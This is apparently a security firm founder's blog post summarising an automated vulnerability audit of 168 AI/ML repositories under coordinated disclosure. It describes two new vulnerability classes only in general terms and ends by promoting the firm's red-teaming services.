We built an automated adversarial analysis pipeline and pointed it at the AI/ML ecosystem.
Not a sample. Not a handful of popular repos. 168 repositories across 50+ organizations, covering the full stack: training frameworks, inference servers, agent toolkits, model format libraries, safety evaluation tools, and production ML infrastructure.
The results were worse than we expected.
Every finding has reproduction steps. Every disclosure report follows responsible disclosure conventions. We are not publishing specifics until affected organizations have had time to patch.
The pipeline covers six primary vulnerability categories:
We are deliberately not disclosing which specific scanners, rules, or detection techniques the pipeline uses. The methodology is proprietary.
We discovered two vulnerability classes that, to our knowledge, have not been previously documented:
The first involves bypassing a model serialization format that was specifically designed to be safe. The format was created as an industry response to known deserialization risks, and the ecosystem is actively migrating toward it. We found that the safety guarantee can be circumvented. Details will be published after coordinated disclosure.
The second involves escaping a sandboxed code execution environment through the semantics of libraries that the sandbox explicitly allows. The sandbox correctly restricts dangerous functions, but certain combinations of permitted operations can be chained to achieve arbitrary attribute access. Details will be published after coordinated disclosure.
Both have been reported to the affected maintainers.
The finding that concerns us most isn't any single vulnerability. It's the pattern.
The AI safety evaluation tools -- the systems designed to test whether AI is safe to deploy -- contain the same vulnerability classes they are supposed to detect. Safety scanners with deserialization flaws. Red teaming tools with injection vulnerabilities. Guardrail systems that can be bypassed through their own dependencies.
This is not a theoretical concern. We found concrete, reproducible vulnerabilities in production safety tools that organizations rely on for deployment decisions. If the tools certifying that a system is safe are themselves compromised, the certification is meaningless.
We have prior work in this area. In April 2026, we identified and fixed a prompt injection vulnerability in UK AISI's ControlArena monitor framework (PR #798), where adversarial agents could inject into their own safety evaluation. The pattern is broader than one framework.
Coordinated disclosure is in progress. We are not naming specific products, organizations, or vulnerability details until maintainers have had adequate time to respond and patch.
We are publishing the aggregate numbers and general categories because:
We are working through 126 disclosure reports. Some organizations have already responded. Others have not. We will publish detailed findings -- including the two novel vulnerability classes -- as patches are deployed and disclosure timelines are met.
If you are a maintainer of an AI/ML project and want to know whether your repository was included in this audit, contact us at john@authensor.com.
If you want this pipeline pointed at your own infrastructure before someone else finds what we would find, that is what Authensor's red teaming services exist for.
John Kearney is the founder of Authensor and 15 Research Lab. He builds automated adversarial analysis tools for AI/ML infrastructure and contributes to AI safety evaluation frameworks including UK AISI's ControlArena.